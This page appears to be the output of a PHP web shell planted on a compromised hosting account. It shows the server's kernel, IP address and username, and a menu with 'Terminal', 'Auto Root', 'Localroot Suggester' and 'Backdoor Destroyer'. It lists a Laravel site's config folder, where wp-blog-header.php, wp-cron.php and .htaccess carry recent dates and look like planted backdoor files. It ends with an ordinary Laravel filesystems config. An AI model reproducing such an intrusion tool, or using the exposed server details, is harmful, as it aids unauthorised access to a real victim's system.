Linux premium61.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.53 & Your IP : 216.73.216.73
Domains :
Cant Read [ /etc/named.conf ]
User : vdeshvpx
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
vdeshvpx /
adminapi.linkcrow.com /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-08 06:51
app.php
9.12
KB
-rwxrwxrwx
2024-11-02 06:21
auth.php
3.83
KB
-rwxrwxrwx
2024-06-30 18:36
broadcasting.php
1.62
KB
-rwxrwxrwx
2024-06-30 18:36
cache.php
3.13
KB
-rwxrwxrwx
2024-06-30 18:36
cors.php
877
B
-rwxrwxrwx
2024-08-05 09:59
current.php
22
B
-rw-r--r--
2026-04-01 01:39
database.php
5.08
KB
-rwxrwxrwx
2024-06-30 18:36
dompdf.php
11.21
KB
-rwxrwxrwx
2024-11-02 06:21
error_log
12.15
KB
-rw-r--r--
2026-02-09 00:56
filesystems.php
2.71
KB
-rwxrwxrwx
2024-06-30 18:36
hashing.php
1.58
KB
-rwxrwxrwx
2024-06-30 18:36
logging.php
2.93
KB
-rwxrwxrwx
2024-06-30 18:36
mail.php
3.4
KB
-rwxrwxrwx
2024-06-30 18:36
permission.php
6.54
KB
-rwxrwxrwx
2024-06-30 18:36
queue.php
2.79
KB
-rwxrwxrwx
2024-06-30 18:36
sanctum.php
2.31
KB
-rwxrwxrwx
2024-06-30 18:36
services.php
981
B
-rwxrwxrwx
2024-06-30 18:36
session.php
7.07
KB
-rwxrwxrwx
2024-06-30 18:36
view.php
1.06
KB
-rwxrwxrwx
2024-06-30 18:36
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Default Filesystem Disk |-------------------------------------------------------------------------- | | Here you may specify the default filesystem disk that should be used | by the framework. The "local" disk, as well as a variety of cloud | based disks are available to your application. Just store away! | */ 'default' => env('FILESYSTEM_DRIVER', 'local'), /* |-------------------------------------------------------------------------- | Default Cloud Filesystem Disk |-------------------------------------------------------------------------- | | Many applications store files both locally and in the cloud. For this | reason, you may specify a default "cloud" driver here. This driver | will be bound as the Cloud disk implementation in the container. | */ 'cloud' => env('FILESYSTEM_CLOUD', 's3'), /* |-------------------------------------------------------------------------- | Filesystem Disks |-------------------------------------------------------------------------- | | Here you may configure as many filesystem "disks" as you wish, and you | may even configure multiple disks of the same driver. Defaults have | been setup for each driver as an example of the required options. | | Supported Drivers: "local", "ftp", "sftp", "s3" | */ 'disks' => [ 'local' => [ 'driver' => 'local', 'root' => storage_path('app'), ], 'public' => [ 'driver' => 'local', 'root' => storage_path('app/public'), 'url' => env('APP_URL').'/storage', 'visibility' => 'public', ], 's3' => [ 'driver' => 's3', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION'), 'bucket' => env('AWS_BUCKET'), 'url' => env('AWS_URL'), 'endpoint' => env('AWS_ENDPOINT'), ], ], /* |-------------------------------------------------------------------------- | Symbolic Links |-------------------------------------------------------------------------- | | Here you may configure the symbolic links that will be created when the | `storage:link` Artisan command is executed. The array keys should be | the locations of the links and the values should be their targets. | */ 'links' => [ public_path('storage') => storage_path('app/public'), ], ];